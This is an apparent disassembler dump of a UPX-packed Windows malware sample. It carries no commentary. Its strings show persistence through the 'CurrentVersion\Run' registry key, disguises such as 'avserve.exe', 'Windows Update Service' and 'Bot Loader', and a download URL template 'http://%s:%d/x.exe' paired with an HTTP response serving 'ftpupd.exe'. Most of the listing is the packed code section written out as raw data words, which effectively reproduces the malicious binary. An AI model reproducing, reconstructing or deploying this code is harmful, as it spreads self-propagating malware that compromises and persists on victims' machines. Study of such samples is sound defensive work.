aHttp1_1200OkCo db 'HTTP/1.1 200 OK',0Dh,0Ah ; DATA XREF: sub_3142207E+71�o
db 'Content-Type: application/x-exe-compressed',0Dh,0Ah,0
align 4
aGet db 'GET',0 ; DATA XREF: sub_3142207E+3D�o
aFtpupd_exe db 'ftpupd.exe',0 ; DATA XREF: UPX0:3142233C�o
align 4
aUser32 db 'user32',0 ; DATA XREF: sub_314223B2+133�o
align 4
aMsvcrt db 'msvcrt',0 ; DATA XREF: sub_314223B2+125�o
align 4
aWininet db 'wininet',0 ; DATA XREF: sub_314223B2+11E�o
aWs2_32 db 'ws2_32',0 ; DATA XREF: sub_314223B2+111�o
align 4
aU19x db 'u19x',0 ; DATA XREF: sub_314223B2+BD�o
align 4
aU19 db 'u19',0 ; DATA XREF: sub_314223B2+B6�o
aU18 db 'u18',0 ; DATA XREF: sub_314223B2+AF�o
aU17 db 'u17',0 ; DATA XREF: sub_314223B2+A8�o
aU16 db 'u16',0 ; DATA XREF: sub_314223B2+A1�o
aU15 db 'u15',0 ; DATA XREF: sub_314223B2+9A�o
aU14 db 'u14',0 ; DATA XREF: sub_314223B2+93�o
aU13i db 'u13i',0 ; DATA XREF: sub_314223B2+8C�o
align 4
aU13 db 'u13',0 ; DATA XREF: sub_314223B2+85�o
aU12 db 'u12',0 ; DATA XREF: sub_314223B2+7E�o
aU11 db 'u11',0 ; DATA XREF: sub_314223B2+77�o
aU10 db 'u10',0 ; DATA XREF: sub_314223B2+70�o
aU9 db 'u9',0 ; DATA XREF: sub_314223B2+69�o
align 4
aU8 db 'u8',0 ; DATA XREF: sub_314223B2+62�o
align 4
aU18x db 'u18x',0 ; DATA XREF: sub_314223B2+5B�o
align 4
aU17x db 'u17x',0 ; DATA XREF: sub_314223B2+54�o
align 4
aU16x db 'u16x',0 ; DATA XREF: sub_314223B2+4D�o
align 4
aU15x db 'u15x',0 ; DATA XREF: sub_314223B2+46�o
align 4
aU14x db 'u14x',0 ; DATA XREF: sub_314223B2+3F�o
align 4
aU13x db 'u13x',0 ; DATA XREF: sub_314223B2+38�o
align 4
aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31�o
align 4
aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2A�o
align 4
aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23�o
align 4
aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2D�o
align 4
aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_314221C4+23�o
; sub_314229E6+66�o ...
align 4
aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1C�o
; sub_31422A9B+87�o ...
align 10h
aJutgkfousuoenl db 'jutgkfousuoenlppl',0 ; DATA XREF: sub_314215C7+4F�o
; sub_31422B67+57�o ...
align 8
aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32�o
aClient db 'Client',0 ; DATA XREF: sub_31422B67+BC�o
; sub_31422B67+F8�o
align 4
aId db 'ID',0 ; DATA XREF: sub_31422B67+37�o
; sub_31422B67+75�o
align 10h
aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55�o
align 10h
aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4E�o
align 10h
aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47�o
align 4
aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40�o
aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39�o
align 10h
aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32�o
align 4
aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24�o
align 10h
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16�o
align 4
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+F�o
align 4
a1: ; DATA XREF: sub_31422B67+B7�o
unicode 0, <1>,0
dd 7 dup(0)
dword_31424FE8 dd 0 ; DATA XREF: sub_3142207E+C7�r
; sub_314221C4+80�w
dword_31424FEC dd 0 ; DATA XREF: sub_314215C7+43�r
; sub_314216A2+53�o ...
dword_31424FF0 dd 0 ; DATA XREF: sub_3142207E+79�r
; sub_3142207E:loc_3142212C�r ...
dword_31424FF4 dd 68h ; DATA XREF: sub_31421DF0+C2�r
; UPX0:3142235C�w ...
dword_31424FF8 dd 0 ; DATA XREF: sub_3142239E+2�r
; sub_314223B2+CE�w
dword_31424FFC dd 0 ; DATA XREF: sub_314221C4+E0�w
; sub_31422712+20�r
dword_31425000 dd 31420000h ; DATA XREF: sub_31421DF0+6�r
; UPX0:31422341�w
dword_31425004 dd 0 ; DATA XREF: sub_314215C7+49�r
; sub_314216A2+4A�o ...
dword_31425008 dd 0 ; DATA XREF: UPX0:314227AF�w
; UPX0:314227C1�w
word_3142500C dw 0 ; DATA XREF: sub_3142255F+3B�r
; sub_314225C3:loc_31422624�r ...
align 10h
dword_31425010 dd 0 ; DATA XREF: sub_31422B67+25�w
; sub_31422B67+110�w
align 1000h
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h
; DATA XREF: UPX1:31427BB1�o
dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh
dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h
dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh
dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h
dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h
dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh
dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h
dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h
dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h
dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h
dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch
dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h
dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h
dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h
dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h
dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h
dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h
dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h
dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h
dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h
dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h
dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h
dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h
dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h
dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h
dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h
dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h
dd 72457473h, 726F72h, 0D100h, 0
dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h
dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h
dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh
dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h
dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h
dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh
dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h
dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h
dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h
dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h
dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h
dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h
dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h
dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h
dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h
dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h
dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h
dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h
dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh
dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h
dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h
dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch
dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh
dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h
dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h
dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h
dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h
dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h
dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h
dd 40D859h, 0
dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h
dd 10h, 40h, 314200h, 10h, 4000002h, 0
dd 4000000h, 2 dup(0)
dd 60h, 4, 2000000h, 0
dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0)
dd 34000000h, 8C00002Dh, 15h dup(0)
dd 7C000010h, 1, 5 dup(0)
dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0)
dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h
dd 10h, 2Ah, 2 dup(0)
dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h
dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch
dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h
dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h
dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h
dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h
dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h
dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh
dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh
dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h
dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h
dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h
dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h
dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h
dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h
dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch
dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h
dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh
dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h
dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h
dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h
dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h
dd 0EE062AB4h, 1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h
dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah
dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h
dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h
dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh
dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh
dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh
dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh
dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh
dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h
dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h
dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h
dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh
dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh
dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch
dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch
dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h
dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h
dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h
dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h
dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h
dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h
dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h
dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h
dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh
dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h
dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h
dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h
dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h
dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h
dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h
dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h
dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h
dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h
dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 0EC5D89E8h, 0DFFF050Dh
dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh
dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h
dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h
dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh
dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h
dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh
dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h
dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah
dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h
dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h
dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h
dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h
dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h
dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h
dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch
dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh
dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h
dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h
dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h
dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh
dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h
dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh
dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h
dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh
dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h
dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h
dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h
dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h
dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h
dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh
dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h
dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh
dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh
dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 68661C4Dh
dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah
dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh
dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh
dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh
dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h
dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h
dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h
dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh
dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh
dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h
dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h
dd 21DE53C3h, 948E694Eh
dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch
dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h
dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh
dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h
dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h
dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h
dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h
dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h
dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h
dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h
dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h
dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h
dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h
dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h
dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h
dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh
dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh
dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h
dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h
dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh
dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h
dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h
dd 0CC401113h, 0F42A66E7h, 2806FF00h, 0A910F805h, 0F49199EFh
dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh
dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh
dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h
dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh
dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh
dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh
dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh
dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h
dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h
dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h
dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh
dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah
dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h
dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h
dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh
dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h
dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h
dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h
dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h
dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh
dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h
dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h
dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h
dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh
dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h
dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h
dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h
dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh
dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h
dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch
dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah
dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h
dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh
dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h
dd 3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh
dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h
dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h
dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh
dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh
dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh
dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh
dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah
dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h
dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h
dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh
dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh
dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h
dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h
dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah
dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh
dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h
dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh
dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh
dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h
dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h
dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h
dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h
dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h
dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h
dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h
dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h
dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h
dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h
dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h
dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h
dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh
dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h
dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h
dd 496D899Bh, 0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h
dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h
dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h
dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h
dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h
dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h
dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h
dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h
dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h
dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh
dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h
dd 2FE409CFh, 230EFEFFh
